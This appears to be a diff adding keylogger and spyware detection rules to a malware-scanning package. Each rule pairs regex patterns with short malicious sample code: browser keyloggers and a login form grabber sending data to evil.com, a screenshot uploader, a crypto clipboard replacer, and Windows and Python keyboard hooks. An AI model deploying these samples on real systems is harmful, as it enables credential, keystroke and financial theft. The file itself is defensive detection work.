package/src/rules/vulnerabilities/PROMPT_VULNERABILITIES.md +226 -0
package/src/rules/vulnerabilities/constants/index.ts +625 -0
package/src/rules/vulnerabilities/engine/index.ts +831 -0
package/src/rules/vulnerabilities/index.ts +312 -0
package/src/rules/vulnerabilities/rules/authentication.ts +426 -0
package/src/rules/vulnerabilities/rules/commandInjection.ts +307 -0
package/src/rules/vulnerabilities/rules/csrf.ts +268 -0
package/src/rules/vulnerabilities/rules/deserialization.ts +343 -0
package/src/rules/vulnerabilities/rules/fileUpload.ts +332 -0
package/src/rules/vulnerabilities/rules/hardcodedSecrets.ts +453 -0
package/src/rules/vulnerabilities/rules/index.ts +17 -0
package/src/rules/vulnerabilities/rules/pathTraversal.ts +358 -0
package/src/rules/vulnerabilities/rules/prototypePollution.ts +279 -0
package/src/rules/vulnerabilities/rules/securityMisconfiguration.ts +445 -0
package/src/rules/vulnerabilities/rules/sqlInjection.ts +669 -0
package/src/rules/vulnerabilities/rules/ssrf.ts +408 -0
package/src/rules/vulnerabilities/rules/xss.ts +753 -0
package/src/rules/vulnerabilities/scoring/index.ts +543 -0
package/src/rules/vulnerabilities/types/index.ts +1004 -0
package/src/rules/vulnerabilities/utils/index.ts +709 -0
package/src/types/index.ts +391 -0
package/src/utils/index.ts +306 -0
package/src/utils/logger.ts +150 -0
package/test-installed-scanner.ts +136 -0
package/tsconfig.json +30 -0

package/src/rules/malware/categories/keyloggers.ts ADDED Viewed

@@ -0,0 +1,780 @@
+/**
+ * @fileoverview Keylogger and Spyware Detection Rules
+ * @module rules/malware/categories/keyloggers
+ *
+ * Comprehensive rules for detecting keylogging and spyware including:
+ * - JavaScript keyloggers (browser-based)
+ * - System-level keyloggers (Python, C#, C/C++)
+ * - Form grabbers
+ * - Clipboard monitors
+ * - Screen capture malware
+ */
+import {
+  MalwareRule,
+  MalwareThreatType,
+  MalwareCategory,
+  MalwareSeverity,
+  ConfidenceLevel,
+  SupportedLanguage,
+  PatternType,
+  MitreTactic
+} from '../types';
+// ============================================================================
+// JAVASCRIPT KEYLOGGER RULES
+// ============================================================================
+export const jsKeyloggerRules: MalwareRule[] = [
+  {
+    id: 'MAL-KEY-001',
+    name: 'JavaScript Keylogger - Event Listener',
+    description: 'Detects JavaScript code that captures keyboard events with potential data exfiltration.',
+    version: '2.0.0',
+    threatType: MalwareThreatType.KEYLOGGER,
+    category: MalwareCategory.SPYWARE,
+    languages: [SupportedLanguage.JAVASCRIPT, SupportedLanguage.TYPESCRIPT],
+    severity: MalwareSeverity.CRITICAL,
+    confidence: ConfidenceLevel.HIGH,
+    baseScore: 85,
+    patterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'keydown-listener',
+        pattern: 'addEventListener\\s*\\([\'"]key(?:down|up|press)[\'"][\\s\\S]*?(?:fetch|XMLHttpRequest|ajax|axios|sendBeacon|WebSocket)',
+        flags: 'gis',
+        weight: 1.0,
+        description: 'Key event listener with network activity'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'onkey-handler',
+        pattern: '(?:document|window)\\.onkey(?:down|up|press)\\s*=\\s*function[\\s\\S]*?(?:http|fetch|send)',
+        flags: 'gis',
+        weight: 1.0,
+        description: 'onkey handler with network call'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'key-accumulator',
+        pattern: 'key(?:down|up|press)[\\s\\S]*?(?:push|concat|\\+=)[\\s\\S]*?(?:key|char|which|keyCode)',
+        flags: 'gis',
+        weight: 0.8,
+        description: 'Key accumulation pattern'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'input-monitor',
+        pattern: 'addEventListener\\s*\\([\'"]input[\'"][\\s\\S]*?(?:\\$\\.post|fetch|XMLHttpRequest)',
+        flags: 'gis',
+        weight: 0.9,
+        description: 'Input monitoring with exfiltration'
+      }
+    ],
+    amplifyingPatterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'password-focus',
+        pattern: 'type\\s*[=:]\\s*[\'"]password[\'"]|\\[type=password\\]',
+        flags: 'gi',
+        weight: 0.5,
+        description: 'Password field targeting'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'hidden-exfil',
+        pattern: 'display\\s*:\\s*none|visibility\\s*:\\s*hidden|position\\s*:\\s*absolute[^}]*-9999',
+        flags: 'gi',
+        weight: 0.3,
+        description: 'Hidden exfiltration elements'
+      }
+    ],
+    falsePositivePatterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'analytics-context',
+        pattern: 'analytics|tracking|hotjar|mouseflow|fullstory',
+        flags: 'gi',
+        weight: 0.4,
+        description: 'Legitimate analytics tools'
+      }
+    ],
+    maliciousExamples: [
+      {
+        code: `let keys = [];
+document.addEventListener('keydown', (e) => {
+  keys.push(e.key);
+  if (keys.length >= 20) {
+    fetch('https://evil.com/log', {
+      method: 'POST',
+      body: JSON.stringify({ keys: keys, url: location.href })
+    });
+    keys = [];
+  }
+});`,
+        language: SupportedLanguage.JAVASCRIPT,
+        isMalicious: true,
+        description: 'Keylogger with batch exfiltration'
+      }
+    ],
+    falsePositiveExamples: [
+      {
+        code: `document.addEventListener('keydown', (e) => {
+  if (e.key === 'Escape') {
+    closeModal();
+  }
+});`,
+        language: SupportedLanguage.JAVASCRIPT,
+        isMalicious: false,
+        description: 'Legitimate keyboard shortcut handler'
+      }
+    ],
+    impact: {
+      technical: 'Captures and exfiltrates user keystrokes including passwords and sensitive data.',
+      business: 'Credential theft, data breach, identity theft risk.',
+      affectedAssets: ['User credentials', 'Sensitive input data'],
+      dataAtRisk: ['Passwords', 'Personal information', 'Financial data']
+    },
+    remediation: {
+      summary: 'Remove keylogger code and audit all keyboard event handlers.',
+      steps: [
+        'Remove the malicious event listeners',
+        'Audit all keyboard event handlers in the codebase',
+        'Implement Content Security Policy',
+        'Review third-party scripts',
+        'Consider using virtual keyboards for sensitive input'
+      ]
+    },
+    mitreAttack: [
+      {
+        tacticId: MitreTactic.CREDENTIAL_ACCESS,
+        tacticName: 'Credential Access',
+        techniqueId: 'T1056.001',
+        techniqueName: 'Keylogging',
+        url: 'https://attack.mitre.org/techniques/T1056/001/'
+      },
+      {
+        tacticId: MitreTactic.COLLECTION,
+        tacticName: 'Collection',
+        techniqueId: 'T1056',
+        techniqueName: 'Input Capture',
+        url: 'https://attack.mitre.org/techniques/T1056/'
+      }
+    ],
+    tags: ['keylogger', 'javascript', 'spyware', 'credential-theft', 'critical'],
+    enabled: true
+  },
+  {
+    id: 'MAL-KEY-002',
+    name: 'JavaScript Keylogger - Form Grabber',
+    description: 'Detects form submission interception and data stealing.',
+    version: '2.0.0',
+    threatType: MalwareThreatType.CREDENTIAL_STEALER,
+    category: MalwareCategory.SPYWARE,
+    languages: [SupportedLanguage.JAVASCRIPT, SupportedLanguage.TYPESCRIPT],
+    severity: MalwareSeverity.CRITICAL,
+    confidence: ConfidenceLevel.HIGH,
+    baseScore: 88,
+    patterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'form-submit-intercept',
+        pattern: 'addEventListener\\s*\\([\'"]submit[\'"][\\s\\S]*?(?:fetch|XMLHttpRequest|ajax|\\$\\.post)',
+        flags: 'gis',
+        weight: 0.9,
+        description: 'Form submit interception with exfil'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'form-data-grab',
+        pattern: 'new\\s+FormData\\s*\\([^)]*\\)[\\s\\S]*?(?:fetch|post|send)[\\s\\S]*?(?!same-origin)',
+        flags: 'gis',
+        weight: 0.8,
+        description: 'FormData extraction and sending'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'login-form-target',
+        pattern: 'querySelector\\s*\\([\'"][^\'\"]*(?:login|signin|password)[^\'\"]*[\'"]\\)[\\s\\S]*?(?:value|innerText)',
+        flags: 'gis',
+        weight: 0.9,
+        description: 'Login form field extraction'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'parallel-exfil',
+        pattern: 'addEventListener\\s*\\([\'"]submit[\'"][\\s\\S]*?(?:Image|img)\\.src\\s*=',
+        flags: 'gis',
+        weight: 1.0,
+        description: 'Image beacon exfiltration on submit'
+      }
+    ],
+    maliciousExamples: [
+      {
+        code: `document.querySelector('form[action*="login"]').addEventListener('submit', (e) => {
+  const formData = new FormData(e.target);
+  const img = new Image();
+  img.src = 'https://evil.com/steal?u=' + encodeURIComponent(formData.get('username')) +
+            '&p=' + encodeURIComponent(formData.get('password'));
+});`,
+        language: SupportedLanguage.JAVASCRIPT,
+        isMalicious: true,
+        description: 'Login form grabber with image beacon'
+      }
+    ],
+    impact: {
+      technical: 'Intercepts form submissions to steal credentials and sensitive data.',
+      business: 'Direct credential theft leading to account compromise.',
+      affectedAssets: ['User accounts', 'Login credentials'],
+      dataAtRisk: ['Usernames', 'Passwords', 'Form data']
+    },
+    remediation: {
+      summary: 'Remove form grabber and implement form submission monitoring.',
+      steps: [
+        'Remove malicious form event listeners',
+        'Audit all form submit handlers',
+        'Implement Subresource Integrity for scripts',
+        'Use CSP to restrict data exfiltration'
+      ]
+    },
+    mitreAttack: [
+      {
+        tacticId: MitreTactic.CREDENTIAL_ACCESS,
+        tacticName: 'Credential Access',
+        techniqueId: 'T1056.003',
+        techniqueName: 'Web Portal Capture',
+        url: 'https://attack.mitre.org/techniques/T1056/003/'
+      }
+    ],
+    tags: ['keylogger', 'form-grabber', 'credential-theft', 'critical'],
+    enabled: true
+  }
+];
+// ============================================================================
+// SYSTEM KEYLOGGER RULES
+// ============================================================================
+export const systemKeyloggerRules: MalwareRule[] = [
+  {
+    id: 'MAL-KEY-010',
+    name: 'Python Keylogger - pynput Library',
+    description: 'Detects Python keyloggers using the pynput library.',
+    version: '2.0.0',
+    threatType: MalwareThreatType.KEYLOGGER,
+    category: MalwareCategory.SPYWARE,
+    languages: [SupportedLanguage.PYTHON],
+    severity: MalwareSeverity.CRITICAL,
+    confidence: ConfidenceLevel.CONFIRMED,
+    baseScore: 90,
+    patterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'pynput-listener',
+        pattern: 'pynput\\.keyboard\\.Listener\\s*\\(',
+        flags: 'gi',
+        weight: 0.9,
+        description: 'pynput keyboard listener'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'pynput-onpress',
+        pattern: 'on_press\\s*=\\s*(?:lambda|def)',
+        flags: 'gi',
+        weight: 0.8,
+        description: 'pynput on_press callback'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'keyboard-hook-log',
+        pattern: 'keyboard\\.on_(?:press|release)[\\s\\S]*?(?:write|append|log|send|post)',
+        flags: 'gis',
+        weight: 1.0,
+        description: 'Keyboard hook with logging'
+      }
+    ],
+    amplifyingPatterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'file-write',
+        pattern: 'open\\s*\\([^)]+,\\s*[\'"][wa][\'"]\\)[\\s\\S]*?write',
+        flags: 'gis',
+        weight: 0.4,
+        description: 'File write operation'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'smtp-send',
+        pattern: 'smtplib\\.SMTP|sendmail',
+        flags: 'gi',
+        weight: 0.5,
+        description: 'Email sending capability'
+      }
+    ],
+    maliciousExamples: [
+      {
+        code: `from pynput.keyboard import Key, Listener
+import logging
+logging.basicConfig(filename="keylog.txt", level=logging.DEBUG)
+def on_press(key):
+    logging.info(str(key))
+with Listener(on_press=on_press) as listener:
+    listener.join()`,
+        language: SupportedLanguage.PYTHON,
+        isMalicious: true,
+        description: 'Python keylogger with file logging'
+      }
+    ],
+    impact: {
+      technical: 'System-level keystroke capture on the host machine.',
+      business: 'Complete credential and data theft capability.',
+      affectedAssets: ['All user input', 'System credentials'],
+      dataAtRisk: ['All keystrokes', 'Passwords', 'Messages']
+    },
+    remediation: {
+      summary: 'Remove the keylogger script and investigate the installation vector.',
+      steps: [
+        'Remove the malicious Python script',
+        'Check for persistence mechanisms',
+        'Audit installed Python packages',
+        'Change all potentially compromised credentials'
+      ]
+    },
+    mitreAttack: [
+      {
+        tacticId: MitreTactic.CREDENTIAL_ACCESS,
+        tacticName: 'Credential Access',
+        techniqueId: 'T1056.001',
+        techniqueName: 'Keylogging',
+        url: 'https://attack.mitre.org/techniques/T1056/001/'
+      }
+    ],
+    tags: ['keylogger', 'python', 'pynput', 'spyware', 'critical'],
+    enabled: true
+  },
+  {
+    id: 'MAL-KEY-011',
+    name: 'Windows Keylogger - SetWindowsHookEx',
+    description: 'Detects Windows API-based keyloggers using SetWindowsHookEx.',
+    version: '2.0.0',
+    threatType: MalwareThreatType.KEYLOGGER,
+    category: MalwareCategory.SPYWARE,
+    languages: [SupportedLanguage.C, SupportedLanguage.CPP, SupportedLanguage.CSHARP],
+    severity: MalwareSeverity.CRITICAL,
+    confidence: ConfidenceLevel.CONFIRMED,
+    baseScore: 92,
+    patterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'setwindowshookex-kb',
+        pattern: 'SetWindowsHookEx\\s*\\([^)]*WH_KEYBOARD',
+        flags: 'gi',
+        weight: 1.0,
+        description: 'Keyboard hook installation'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'lowlevelkeyboard',
+        pattern: 'SetWindowsHookEx\\s*\\([^)]*WH_KEYBOARD_LL',
+        flags: 'gi',
+        weight: 1.0,
+        description: 'Low-level keyboard hook'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'getasynckeystate',
+        pattern: 'GetAsyncKeyState\\s*\\([^)]*\\)',
+        flags: 'gi',
+        weight: 0.7,
+        description: 'GetAsyncKeyState polling'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'getkeystate',
+        pattern: 'GetKeyState\\s*\\([^)]*\\)',
+        flags: 'gi',
+        weight: 0.6,
+        description: 'GetKeyState polling'
+      }
+    ],
+    amplifyingPatterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'vk-codes',
+        pattern: 'VK_(?:BACK|TAB|RETURN|SHIFT|CONTROL|MENU|SPACE)',
+        flags: 'g',
+        weight: 0.3,
+        description: 'Virtual key code constants'
+      }
+    ],
+    maliciousExamples: [
+      {
+        code: `HHOOK hHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, hInstance, 0);
+MSG msg;
+while (GetMessage(&msg, NULL, 0, 0)) {
+    TranslateMessage(&msg);
+    DispatchMessage(&msg);
+}`,
+        language: SupportedLanguage.CPP,
+        isMalicious: true,
+        description: 'Windows low-level keyboard hook'
+      }
+    ],
+    impact: {
+      technical: 'Low-level Windows keyboard hook capturing all keystrokes.',
+      business: 'Complete system credential and input compromise.',
+      affectedAssets: ['All Windows input', 'System credentials'],
+      dataAtRisk: ['All keystrokes', 'System passwords', 'Sensitive data']
+    },
+    remediation: {
+      summary: 'Remove the keylogger binary and clean the system.',
+      steps: [
+        'Terminate the malicious process',
+        'Remove the executable and any persistence',
+        'Scan system with antimalware tools',
+        'Reset all credentials'
+      ]
+    },
+    tags: ['keylogger', 'windows', 'hook', 'native', 'critical'],
+    enabled: true
+  },
+  {
+    id: 'MAL-KEY-012',
+    name: 'C# Keylogger - .NET Keyboard Hook',
+    description: 'Detects .NET-based keyloggers using keyboard hooks.',
+    version: '2.0.0',
+    threatType: MalwareThreatType.KEYLOGGER,
+    category: MalwareCategory.SPYWARE,
+    languages: [SupportedLanguage.CSHARP],
+    severity: MalwareSeverity.CRITICAL,
+    confidence: ConfidenceLevel.HIGH,
+    baseScore: 88,
+    patterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'dotnet-hook',
+        pattern: '\\[DllImport\\([\'"]user32\\.dll[\'"]\\)\\][\\s\\S]*?SetWindowsHookEx',
+        flags: 'gis',
+        weight: 1.0,
+        description: '.NET SetWindowsHookEx import'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'keyboard-interceptor',
+        pattern: 'class\\s+\\w*(?:Keyboard|Key)(?:Logger|Hook|Interceptor)',
+        flags: 'gi',
+        weight: 0.7,
+        description: 'Keyboard interceptor class'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'rawkeyboard',
+        pattern: 'RawKeyboardHook|GlobalKeyboardHook',
+        flags: 'gi',
+        weight: 0.9,
+        description: 'Raw keyboard hook libraries'
+      }
+    ],
+    maliciousExamples: [
+      {
+        code: `[DllImport("user32.dll")]
+public static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc callback, IntPtr hInstance, uint threadId);
+private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) {
+    if (nCode >= 0) {
+        int vkCode = Marshal.ReadInt32(lParam);
+        StreamWriter sw = new StreamWriter(@"C:\\keylog.txt", true);
+        sw.Write((Keys)vkCode);
+        sw.Close();
+    }
+    return CallNextHookEx(_hookID, nCode, wParam, lParam);
+}`,
+        language: SupportedLanguage.CSHARP,
+        isMalicious: true,
+        description: 'C# keylogger with file logging'
+      }
+    ],
+    impact: {
+      technical: '.NET application capturing keyboard input.',
+      business: 'Credential theft through keyboard monitoring.',
+      affectedAssets: ['User input', 'Credentials'],
+      dataAtRisk: ['Keystrokes', 'Passwords']
+    },
+    remediation: {
+      summary: 'Remove the .NET keylogger and audit managed applications.',
+      steps: [
+        'Remove the malicious assembly',
+        'Check for .NET persistence',
+        'Audit installed .NET applications',
+        'Reset credentials'
+      ]
+    },
+    tags: ['keylogger', 'csharp', 'dotnet', 'windows', 'critical'],
+    enabled: true
+  }
+];
+// ============================================================================
+// CLIPBOARD MONITOR RULES
+// ============================================================================
+export const clipboardMonitorRules: MalwareRule[] = [
+  {
+    id: 'MAL-KEY-020',
+    name: 'Clipboard Stealer - Cryptocurrency Address Replacement',
+    description: 'Detects clipboard hijacking malware that replaces cryptocurrency addresses.',
+    version: '2.0.0',
+    threatType: MalwareThreatType.CREDENTIAL_STEALER,
+    category: MalwareCategory.SPYWARE,
+    languages: [
+      SupportedLanguage.JAVASCRIPT,
+      SupportedLanguage.PYTHON,
+      SupportedLanguage.CSHARP
+    ],
+    severity: MalwareSeverity.HIGH,
+    confidence: ConfidenceLevel.HIGH,
+    baseScore: 78,
+    patterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'clipboard-monitor-js',
+        pattern: 'navigator\\.clipboard\\.(?:readText|read)\\s*\\([\\s\\S]*?(?:match|test|includes)[\\s\\S]*?(?:btc|bitcoin|ethereum|monero|0x)',
+        flags: 'gis',
+        weight: 1.0,
+        description: 'JS clipboard read with crypto detection'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'clipboard-replace',
+        pattern: 'navigator\\.clipboard\\.writeText\\s*\\([^)]*(?:wallet|address|0x)',
+        flags: 'gis',
+        weight: 0.9,
+        description: 'Clipboard write with wallet address'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'pyperclip-monitor',
+        pattern: 'pyperclip\\.(?:paste|copy)[\\s\\S]*?(?:btc|bitcoin|eth|monero|wallet)',
+        flags: 'gis',
+        weight: 1.0,
+        description: 'Python pyperclip with crypto'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'dotnet-clipboard',
+        pattern: 'Clipboard\\.(?:GetText|SetText)[\\s\\S]*?(?:Regex|Match)[\\s\\S]*?(?:btc|bitcoin|ethereum)',
+        flags: 'gis',
+        weight: 1.0,
+        description: '.NET clipboard with crypto regex'
+      }
+    ],
+    maliciousExamples: [
+      {
+        code: `import pyperclip
+import re
+btc_pattern = r'^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$'
+attacker_wallet = '1Attacker...'
+while True:
+    clip = pyperclip.paste()
+    if re.match(btc_pattern, clip):
+        pyperclip.copy(attacker_wallet)`,
+        language: SupportedLanguage.PYTHON,
+        isMalicious: true,
+        description: 'BTC address clipboard replacer'
+      }
+    ],
+    impact: {
+      technical: 'Monitors and modifies clipboard content to steal cryptocurrency.',
+      business: 'Direct financial theft through address replacement.',
+      affectedAssets: ['Cryptocurrency wallets', 'Clipboard data'],
+      dataAtRisk: ['Cryptocurrency funds', 'Clipboard contents']
+    },
+    remediation: {
+      summary: 'Remove clipboard hijacker and verify all recent transactions.',
+      steps: [
+        'Remove the malicious script/application',
+        'Review recent cryptocurrency transactions',
+        'Enable clipboard access notifications',
+        'Verify addresses before transactions'
+      ]
+    },
+    mitreAttack: [
+      {
+        tacticId: MitreTactic.COLLECTION,
+        tacticName: 'Collection',
+        techniqueId: 'T1115',
+        techniqueName: 'Clipboard Data',
+        url: 'https://attack.mitre.org/techniques/T1115/'
+      }
+    ],
+    tags: ['clipboard', 'cryptocurrency', 'stealer', 'high'],
+    enabled: true
+  },
+  {
+    id: 'MAL-KEY-021',
+    name: 'Clipboard Monitor - General Data Theft',
+    description: 'Detects general clipboard monitoring for data theft.',
+    version: '2.0.0',
+    threatType: MalwareThreatType.DATA_EXFILTRATION,
+    category: MalwareCategory.SPYWARE,
+    languages: [
+      SupportedLanguage.JAVASCRIPT,
+      SupportedLanguage.TYPESCRIPT,
+      SupportedLanguage.PYTHON
+    ],
+    severity: MalwareSeverity.MEDIUM,
+    confidence: ConfidenceLevel.MEDIUM,
+    baseScore: 60,
+    patterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'clipboard-interval',
+        pattern: 'setInterval[\\s\\S]*?navigator\\.clipboard\\.readText',
+        flags: 'gis',
+        weight: 0.9,
+        description: 'Periodic clipboard reading'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'clipboard-exfil',
+        pattern: 'navigator\\.clipboard\\.readText[\\s\\S]*?(?:fetch|XMLHttpRequest|sendBeacon)',
+        flags: 'gis',
+        weight: 1.0,
+        description: 'Clipboard read with exfiltration'
+      }
+    ],
+    maliciousExamples: [
+      {
+        code: `setInterval(async () => {
+  const clip = await navigator.clipboard.readText();
+  if (clip !== lastClip) {
+    fetch('/log', { method: 'POST', body: clip });
+    lastClip = clip;
+  }
+}, 1000);`,
+        language: SupportedLanguage.JAVASCRIPT,
+        isMalicious: true,
+        description: 'Clipboard monitoring with exfiltration'
+      }
+    ],
+    impact: {
+      technical: 'Continuous clipboard monitoring and data exfiltration.',
+      business: 'Data theft of copied sensitive information.',
+      affectedAssets: ['Clipboard data'],
+      dataAtRisk: ['Passwords', 'API keys', 'Sensitive text']
+    },
+    remediation: {
+      summary: 'Remove clipboard monitor and audit clipboard permissions.',
+      steps: [
+        'Remove the monitoring code',
+        'Review clipboard permission grants',
+        'Audit for similar patterns'
+      ]
+    },
+    tags: ['clipboard', 'monitor', 'exfiltration', 'medium'],
+    enabled: true
+  }
+];
+// ============================================================================
+// SCREEN CAPTURE RULES
+// ============================================================================
+export const screenCaptureRules: MalwareRule[] = [
+  {
+    id: 'MAL-KEY-030',
+    name: 'Screen Capture Malware',
+    description: 'Detects screen capture functionality used for spyware.',
+    version: '2.0.0',
+    threatType: MalwareThreatType.DATA_EXFILTRATION,
+    category: MalwareCategory.SPYWARE,
+    languages: [
+      SupportedLanguage.JAVASCRIPT,
+      SupportedLanguage.PYTHON,
+      SupportedLanguage.CSHARP
+    ],
+    severity: MalwareSeverity.HIGH,
+    confidence: ConfidenceLevel.MEDIUM,
+    baseScore: 70,
+    patterns: [
+      {
+        type: PatternType.REGEX,
+        patternId: 'js-screen-capture',
+        pattern: 'getDisplayMedia[\\s\\S]*?(?:fetch|XMLHttpRequest|WebSocket|sendBeacon)',
+        flags: 'gis',
+        weight: 0.8,
+        description: 'Screen capture with exfiltration'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'canvas-exfil',
+        pattern: 'canvas[\\s\\S]*?toDataURL[\\s\\S]*?(?:fetch|XMLHttpRequest|post)',
+        flags: 'gis',
+        weight: 0.7,
+        description: 'Canvas capture with exfiltration'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'python-screenshot',
+        pattern: '(?:PIL|pyautogui|mss)\\.(?:screenshot|grab)[\\s\\S]*?(?:send|post|upload)',
+        flags: 'gis',
+        weight: 0.9,
+        description: 'Python screenshot with upload'
+      },
+      {
+        type: PatternType.REGEX,
+        patternId: 'dotnet-screenshot',
+        pattern: 'Graphics\\.CopyFromScreen[\\s\\S]*?(?:Upload|WebClient|HttpClient)',
+        flags: 'gis',
+        weight: 0.9,
+        description: '.NET screenshot with upload'
+      }
+    ],
+    maliciousExamples: [
+      {
+        code: `import pyautogui
+import requests
+while True:
+    screenshot = pyautogui.screenshot()
+    screenshot.save('screen.png')
+    requests.post('http://evil.com/upload', files={'img': open('screen.png', 'rb')})
+    time.sleep(60)`,
+        language: SupportedLanguage.PYTHON,
+        isMalicious: true,
+        description: 'Periodic screenshot exfiltration'
+      }
+    ],
+    impact: {
+      technical: 'Captures and exfiltrates screen content.',
+      business: 'Visual data theft including sensitive displayed information.',
+      affectedAssets: ['Screen content', 'Displayed data'],
+      dataAtRisk: ['Visible documents', 'Financial data', 'Personal information']
+    },
+    remediation: {
+      summary: 'Remove screen capture malware and audit display permissions.',
+      steps: [
+        'Remove the malicious code',
+        'Review screen capture permissions',
+        'Audit for persistence mechanisms'
+      ]
+    },
+    tags: ['screenshot', 'spyware', 'exfiltration', 'high'],
+    enabled: true
+  }
+];
+// ============================================================================
+// EXPORT ALL KEYLOGGER RULES
+// ============================================================================
+export const keyloggerRules: MalwareRule[] = [
+  ...jsKeyloggerRules,
+  ...systemKeyloggerRules,
+  ...clipboardMonitorRules,
+  ...screenCaptureRules
+];
+export default keyloggerRules;